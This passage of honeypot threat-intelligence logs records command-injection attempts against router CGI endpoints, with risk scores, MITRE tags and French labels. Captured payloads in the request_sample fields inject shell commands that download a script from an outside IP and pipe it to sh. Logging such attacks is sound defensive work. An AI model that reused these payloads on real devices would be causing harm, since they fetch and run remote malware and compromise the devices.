\u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022950600:k8s-api\u0022, \u0022http_cmd_injection\u0022, \u0022http_idor_probe\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_api\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":315},{"id":11860771,"ip":"45.156.87.213","ts":"2026-07-14 08:22:34.000000","proto":"tcp","src_port":59926,"dst_port":81,"service":"http","classification":"cmd_injection","waf_score":47,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/cgi-bin\/wireless.cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u00225d213d21ab531035b3d11e0f269406faf9a8e9dd\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 320, \u0022payload_entropy\u0022: 5.15768838381095, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 15, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u002244975a8c148732922162b31805f6d2dc4dff1863\u0022, \u0022event_fingerprint\u0022: \u002299335d5ff8e8965945da99f63e3e84038c7d0520\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 446, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u002231c5b6d1939962bffb8bc661f88c3cb5\u0022, \u0022path_pattern_hash\u0022: \u0022e8069dc607bc4e1a464a8f30c4269ee3\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/cgi-bin\/wireless.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 171\\r\\n\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/wireless.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/wireless.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/wireless.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 171\\r\\nConnection: close\\r\\n\\r\\nsz11gChannel=1`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wdr1;busybox wget http:\/\/91.92.40.118\/wge\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/wireless.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 171\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/wireless.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/wireless.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/wireless.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 171\\r\\nConnection: close\\r\\n\\r\\nsz11gChannel=1`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wdr1;busybox wget http:\/\/91.92.40.118\/wge\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/wireless.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 171\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022d49ed4cd82ca59f43331e8ce0034e59f8441bbd8\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/wireless.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/wireless.cgi HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/wireless.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 171\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/wireless.cgi\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022Http Cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/wireless.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/wireless.cgi HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/wireless.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/wireless.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 171\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":320},{"id":11860772,"ip":"45.156.87.213","ts":"2026-07-14 08:22:34.000000","proto":"tcp","src_port":59930,"dst_port":81,"service":"http","classification":"cmd_injection","waf_score":47,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/cgi-bin\/internet.cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u00220629d7057c54a343dd0d4f93345dc6e243865841\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 325, \u0022payload_entropy\u0022: 5.164317000903758, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 15, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u002244975a8c148732922162b31805f6d2dc4dff1863\u0022, \u0022event_fingerprint\u0022: \u0022a1ffdf0ccca2b4096bf79b17e0f6aa29461db1d1\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 446, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022bfe2c8bdc0a10a1ca80845214d5b147a\u0022, \u0022path_pattern_hash\u0022: \u002279c2d1d58dcaacc68cc00d1bea04f739\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/cgi-bin\/internet.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 176\\r\\n\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/internet.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/internet.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/internet.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 176\\r\\nConnection: close\\r\\n\\r\\ngateway=192.168.1.1`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wdr2;busybox wget http:\/\/91.92.40.11\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/internet.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 176\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/internet.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/internet.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/internet.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 176\\r\\nConnection: close\\r\\n\\r\\ngateway=192.168.1.1`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s wdr2;busybox wget http:\/\/91.92.40.11\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/internet.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 176\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022a7003c6431e5306cf3ffdf69d76e14ae502da1ea\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/internet.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/internet.cgi HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/internet.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 176\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/internet.cgi\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022Http Cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/internet.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/internet.cgi HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/internet.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/internet.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 176\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 